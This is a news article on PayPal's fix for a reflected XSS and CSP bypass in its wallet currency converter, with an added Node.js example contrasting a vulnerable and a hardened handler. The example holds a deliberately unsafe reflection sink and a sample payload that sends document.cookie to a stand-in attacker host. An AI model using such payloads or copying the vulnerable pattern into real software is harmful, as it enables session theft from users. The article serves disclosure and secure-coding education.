PayPal Fixed A Cross-Site Scripting Vulnerability

PayPal has resolved a reflected cross-site scripting (XSS) vulnerability found in the currency converter feature of user wallets. 

First reported privately to PayPal on February 19, 2020, by a bug bounty hunter who goes by the name “Cr33pb0y” on HackerOne, the vulnerability is described in the report as a “reflected XSS and CSP bypass” issue, meaning the site's Content Security Policy, which is intended to stop injected inline script from running, did not prevent the payload from executing.

The affected endpoint belongs to the currency converter feature of PayPal wallets on the main PayPal web domain.

In a limited disclosure published on February 10, 2021, close to a year after the researcher reported the issue privately, PayPal said the bug existed in the currency conversion endpoint and was caused by a failure to properly sanitize user input before it was reflected back into the page.

The endpoint reflected a URL parameter into the response without adequately sanitizing it, which could allow threat actors to inject malicious JavaScript, HTML, or any other code “that the browser could execute,” according to the advisory.

As a result, a malicious payload could execute in the Document Object Model (DOM) of the page in the victim's browser without their knowledge or consent.

In a reflected XSS attack the payload travels in the request itself, typically as a parameter in a crafted link, and the server echoes it back into the response; the victim may only need to click that link for the script to run in their browser, within the origin of the vulnerable site. From there a payload can read whatever the page can, so it may be used to steal cookies that are not marked HttpOnly, session tokens, or account information, or it can serve as a step in wider attacks.

Following the bug bounty hunter's report, PayPal has implemented additional validation checks and sanitizer controls on user input in the currency exchange feature to eliminate the bug.
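The following Node.js snippet is an added illustration, not PayPal's code, and does not reproduce the real endpoint or the researcher's payload. It shows a toy currency-converter handler that reflects a URL parameter unchanged beside a hardened version applying the two controls the fix describes, allowlist validation and output encoding, with a Content Security Policy as a backstop. The endpoint path, the `to` parameter, the currency allowlist and the cookie-stealing payload are all assumptions constructed for the example.

```javascript
// Added example (not PayPal's code): a toy "currency converter" endpoint,
// first as a reflected-XSS sink and then hardened. Plain Node.js, no
// dependencies. Endpoint path, parameter name, allowlist and payload are
// hypothetical and constructed for this illustration.

// HTML-encode untrusted text before placing it in an HTML text or
// attribute context. Covers the five characters that alter HTML parsing.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Validation: the converter only needs a three-letter currency code, so
// anything else is rejected outright. The allowlist is an assumption.
const SUPPORTED = new Set(["USD", "EUR", "GBP", "JPY"]);
function isValidCurrency(code) {
  return typeof code === "string" && /^[A-Z]{3}$/.test(code) && SUPPORTED.has(code);
}

// Pull the `to` query parameter from a request path (URL is a Node global).
function targetCurrency(requestUrl) {
  return new URL(requestUrl, "https://example.test").searchParams.get("to") || "";
}

// VULNERABLE: the parameter is interpolated into the body unchanged, so
// whatever the crafted link carries ends up in the page's DOM as markup.
function vulnerableHandler(requestUrl) {
  const to = targetCurrency(requestUrl);
  return {
    status: 200,
    headers: { "Content-Type": "text/html; charset=utf-8" },
    body: `<p>Converting to ${to}</p>`,
  };
}

// HARDENED: reject anything outside the allowlist, encode on output anyway
// (defense in depth), and send a CSP without 'unsafe-inline' so a future
// encoding slip still cannot execute inline script. A permissive CSP gives
// no such backstop, which is what a "CSP bypass" finding usually means.
function hardenedHandler(requestUrl) {
  const to = targetCurrency(requestUrl);
  const headers = {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
  };
  if (!isValidCurrency(to)) {
    return { status: 400, headers, body: "<p>Unsupported currency code.</p>" };
  }
  return { status: 200, headers, body: `<p>Converting to ${escapeHtml(to)}</p>` };
}

// Constructed attack link: a reflected payload in the `to` parameter that
// would exfiltrate document.cookie to an attacker-controlled host.
const PAYLOAD = "<script>fetch('https://attacker.test/?c='+document.cookie)</script>";
const ATTACK_URL = "/wallet/convert?to=" + encodeURIComponent(PAYLOAD);

// Check a reviewer can run over a response: does the raw payload survive
// into the body, i.e. would the browser parse it as a script element?
function reflectsPayload(response, payload) {
  return response.body.includes(payload);
}

console.log("vulnerable:", vulnerableHandler(ATTACK_URL).body);
console.log("hardened:  ", hardenedHandler(ATTACK_URL).status, hardenedHandler(ATTACK_URL).body);
console.log("legit:     ", hardenedHandler("/wallet/convert?to=EUR").body);
```

Run it with `node` and the vulnerable handler prints the script tag verbatim inside its paragraph, while the hardened handler answers 400 to the attack link and `<p>Converting to EUR</p>` to a legitimate one. Output encoding alone would neutralise this payload, but validating against the three-letter allowlist shrinks the accepted input to exactly what the feature needs, and the CSP only helps as a backstop if it actually forbids inline script.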

A CVE has not been assigned, but the vulnerability has been categorized as medium-severity. The researcher was awarded a $2,900 bounty.

Last year, HackerOne published a list of the most impactful and highest-rewarded vulnerability types reported on the platform during 2020. XSS, improper access control, information disclosure, and Server-Side Request Forgery (SSRF) vulnerabilities secured the top spots.

Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0